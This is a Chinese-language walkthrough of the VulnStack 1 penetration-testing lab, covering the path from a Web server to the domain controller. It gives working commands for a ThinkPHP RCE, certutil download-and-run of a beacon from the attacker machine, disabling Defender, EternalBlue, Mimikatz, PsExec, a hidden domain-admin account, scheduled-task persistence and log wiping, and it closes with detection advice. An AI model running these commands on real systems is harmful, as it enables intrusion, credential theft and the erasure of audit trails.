当前位置: 首页 > news >正文

红日靶场 VulnStack 1 渗透路径解析:从 Web 到域控的 4 个关键攻击阶段

红日靶场 VulnStack 1 渗透实战:从外网突破到域控提权的完整攻击链

1. 靶场环境与攻击路径概览

红日安全团队打造的VulnStack系列靶场已成为内网渗透学习的黄金标准。其中VulnStack 1模拟了典型企业网络架构:一台暴露在公网的Web服务器(Windows 7)作为跳板机,内网中存在域控制器(Windows Server 2008)和域成员服务器(Windows Server 2003)。这种"外网DMZ+内网域环境"的拓扑结构,真实还原了90%以上企业网络的部署方式。

完整的攻击链可分为四个阶段:

  1. 外网信息收集:通过端口扫描、目录爆破等手段定位Web应用漏洞
  2. 初始突破:利用ThinkPHP RCE漏洞获取Web服务器控制权
  3. 横向移动:以Web服务器为跳板,通过MS17-010、PsExec等技术攻陷域控
  4. 权限维持:创建计划任务、服务等方式实现持久化控制
# 典型网络拓扑 攻击机 Kali (192.168.150.128) │ ↓ Web服务器 Win7 (192.168.150.152[外网] + 192.168.52.143[内网]) │ ├─ 域控 Win2008 (192.168.52.138) └─ 域成员 Win2003 (192.168.52.141)

2. 外网突破:ThinkPHP漏洞利用实战

2.1 信息收集与漏洞定位

使用Nmap进行全端口扫描是渗透测试的标准起手式。针对Web服务器,我们需要特别关注80、443等常见Web端口:

nmap -sS -Pn -p- 192.168.150.152 --min-rate=5000 nmap -sV -O -p80,3306 192.168.150.152

扫描结果通常显示:

  • 80端口运行Apache+PHPStudy环境
  • 3306端口开放MySQL服务
  • Web应用指纹识别显示ThinkPHP 5.0框架

ThinkPHP历史上存在多个高危漏洞,其中5.0.x版本的远程代码执行漏洞(CVE-2018-20062)是最具破坏性的突破口。该漏洞源于框架对控制器名的过滤不严,导致攻击者可以直接调用任意类方法。

2.2 RCE漏洞利用过程

通过构造特殊URL触发漏洞执行系统命令:

http://192.168.150.152/index.php?s=/Index/\think\app/invokefunction &function=call_user_func_array &vars[0]=system &vars[1][]=whoami

实际渗透中常用更隐蔽的PowerShell下载执行方式:

certutil -urlcache -split -f http://攻击机IP/beacon.exe C:\Windows\Temp\svchost.exe start C:\Windows\Temp\svchost.exe

注意:真实环境中需先关闭Windows Defender实时防护,可通过以下命令临时禁用:

powershell -c "Set-MpPreference -DisableRealtimeMonitoring $true"

3. 内网横向移动技术解析

3.1 权限提升与信息收集

获取Web服务器shell后,首先需要判断当前权限并收集内网信息:

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" # 系统版本 whoami /priv # 当前权限 ipconfig /all # 网络配置 net view /domain # 域信息 arp -a # ARP缓存

关键发现:

  • 内网网段:192.168.52.0/24
  • 域名称:god.org
  • 域控主机名:OWA (192.168.52.138)

3.2 永恒之蓝攻陷域控

内网扫描发现域控存在MS17-010漏洞时,可采用以下攻击流程:

  1. 配置路由转发(通过已控跳板机访问内网):

    # MSF中添加路由 route add 192.168.52.0 255.255.255.0 [session_id]
  2. 使用MSF模块攻击

    use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.52.138 set payload windows/x64/meterpreter/bind_tcp exploit
  3. 获取域控权限后,使用Mimikatz提取凭证:

    load kiwi creds_all

3.3 PsExec横向移动

当获取到域管理员凭证后,可通过PsExec快速控制其他主机:

PsExec64.exe \\192.168.52.141 -u god\administrator -p Admin12345 -s cmd.exe

横向移动技术对比表

技术手段适用场景优势风险点
MS17-010未打补丁的Windows系统无需凭证可能造成系统蓝屏
PsExec已获取高权限域凭证原生工具,行为隐蔽会产生日志记录
WMI远程执行防火墙放行135端口无文件落地需要管理员权限
计划任务需要持久化控制可设置定时触发需配置任务路径

4. 权限维持与痕迹清理

4.1 创建隐藏用户

在域控上添加隐蔽后门账户:

net user backup$ Admin@123 /add /domain net group "Domain Admins" backup$ /add /domain

4.2 计划任务持久化

通过计划任务实现自启动:

schtasks /create /tn "WindowsUpdate" /tr "C:\Windows\Temp\svchost.exe" /sc onstart /ru "SYSTEM"

4.3 日志清理技巧

清除安全日志需要注意权限问题:

wevtutil cl security wevtutil cl system wevtutil cl application

对于更彻底的痕迹清理,可先停止日志服务:

net stop eventlog /y del /q /f %WINDIR%\System32\winevt\Logs\* net start eventlog

5. 防御建议与攻击检测

5.1 企业防护措施

  • 外网边界:对ThinkPHP等框架保持版本更新,WAF规则需包含常见RCE payload检测
  • 内网防护:部署终端EDR解决方案,监控PsExec、WMIExec等横向移动工具的使用
  • 域控加固:启用LSA保护,限制域管理员登录范围,定期检查异常账户

5.2 攻击检测指标

  • 日志分析关键点

    • 短时间内大量出现Event ID 4624(登录类型3)后接Event ID 4672(特权登录)
    • 安全日志中出现Event ID 4688(新进程创建)执行certutil、powershell等下载行为
    • Sysmon日志中的PsExec父进程异常(正常应来自sysinternals目录)
  • 网络流量特征

    • SMB协议中出现NTLM认证请求后接大量IPC$共享访问
    • 内网主机向未知IP发起反向连接(Beacon心跳通信)
http://www.cnnetsun.cn/news/3303039.html

相关文章:

  • 三重积分计算实战:5种常见曲面边界识别与3类坐标系选择指南
  • 工业AI安全实战:协议语义理解与五层防御纵深
  • AI对齐通讯第200期核心议题解析
  • 苍穹外卖体会
  • Linux sendfile零拷贝机制:原理、性能测试与高并发实战
  • C++配置文件引导优化PGO实战——让编译器基于运行时数据做出更优决策
  • OpenHarmony 权限动态申请封装(API Version23 + 适配版)
  • ArkUI 筛选清空后列表还乱怎么办:中式美食关键词、分类和排序状态怎么收口
  • 学生信息管理系统结构化需求分析:从7个非功能性需求到3级数据流图
  • 【Bug已解决】openclaw git integration failed / Cannot detect repository — OpenClaw Git 集成失败解决方案
  • Spring Cloud - 黑马商城
  • 蓝桥杯国赛深度反思:如果重来一次,我会这样优化备赛计划
  • 华为S5700交换机VLAN配置实战:基于700人企业网络的5步优化方案
  • 2026湖南GEO网站定制开发公司最新推荐:实地探访聚之唯,拆解AI时代官网开发的技术内幕
  • Seedream 5.0 Pro多模态图像生成模型:从技术原理到数据可视化实战
  • Cartographer 建图到导航实战:从 .pbstream 到 ROS 地图的 2 种转换方法与 Nav2 集成
  • 数据中心AI化转型:技术架构演进与社会影响深度解析
  • NLP入门实战:Word2Vec词向量与RNN/LSTM情感分类完整指南
  • VSCode 1.90 代码片段进阶:3种头文件保护宏命名规则与变量解析
  • Spark 3.5 核心算子性能对比:map vs mapPartitions 在 10GB 数据集上的吞吐量差异
  • 遗传算法实战:从编码选择到动态参数调优的工程落地路径
  • sychronized 的自旋锁、偏向锁、轻量级锁、重量级锁,分别介绍和联系
  • 4K短片《潮湿的怒火》:艾滋病恐惧与社会偏见的心理写实
  • iOS激活锁绕过神器:applera1n免费工具完全指南
  • 2025年最强微信小程序反编译工具:unveilr 2.0.0完全解析指南
  • MoE模型prefill并行化:专家并行架构与vLLM优化实践
  • 深度解析:抖音GEO优化与短视频SEO技术机制——从RAG检索到算法权重重构 2026年的抖音,不刷是损失,不搜才是。
  • 数据加密与参数签名分析:常见加密算法、签名逻辑与逆向分析思路实战
  • 机器学习第一次作业-Numpy
  • 如何快速构建多平台音乐解析服务:终极实践指南